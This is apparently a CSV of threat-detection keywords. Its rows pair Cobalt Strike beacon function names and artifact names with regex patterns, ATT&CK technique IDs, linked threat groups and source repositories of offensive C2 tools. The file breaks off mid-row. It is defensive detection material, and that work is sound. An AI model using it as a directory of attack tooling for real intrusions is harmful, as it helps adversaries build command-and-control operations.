"*beacon_log_clean*",".{0,1000}beacon_log_clean.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*beacon_output_ps.cna*",".{0,1000}beacon_output_ps\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*beacon_print*",".{0,1000}beacon_print.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","1","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "*BEACON_RDLL_*",".{0,1000}BEACON_RDLL_.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_remote_exec_*",".{0,1000}beacon_remote_exec_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_remote_exec_method_describe*",".{0,1000}beacon_remote_exec_method_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_remote_exec_method_register*",".{0,1000}beacon_remote_exec_method_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_remote_exec_methods*",".{0,1000}beacon_remote_exec_methods.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_remote_exploit*",".{0,1000}beacon_remote_exploit.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_remote_exploit_arch*",".{0,1000}beacon_remote_exploit_arch.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_remote_exploit_describe*",".{0,1000}beacon_remote_exploit_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_remote_exploit_register*",".{0,1000}beacon_remote_exploit_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_remote_exploits*",".{0,1000}beacon_remote_exploits.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_smb.exe*",".{0,1000}beacon_smb\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Beacon_Stage_p2_Stuct*",".{0,1000}Beacon_Stage_p2_Stuct.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*beacon_stage_pipe*",".{0,1000}beacon_stage_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_stage_pipe*",".{0,1000}beacon_stage_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Beacon_Stage_Struct_p1*",".{0,1000}Beacon_Stage_Struct_p1.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*Beacon_Stage_Struct_p3*",".{0,1000}Beacon_Stage_Struct_p3.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*beacon_stage_tcp*",".{0,1000}beacon_stage_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_stage_tcp*",".{0,1000}beacon_stage_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 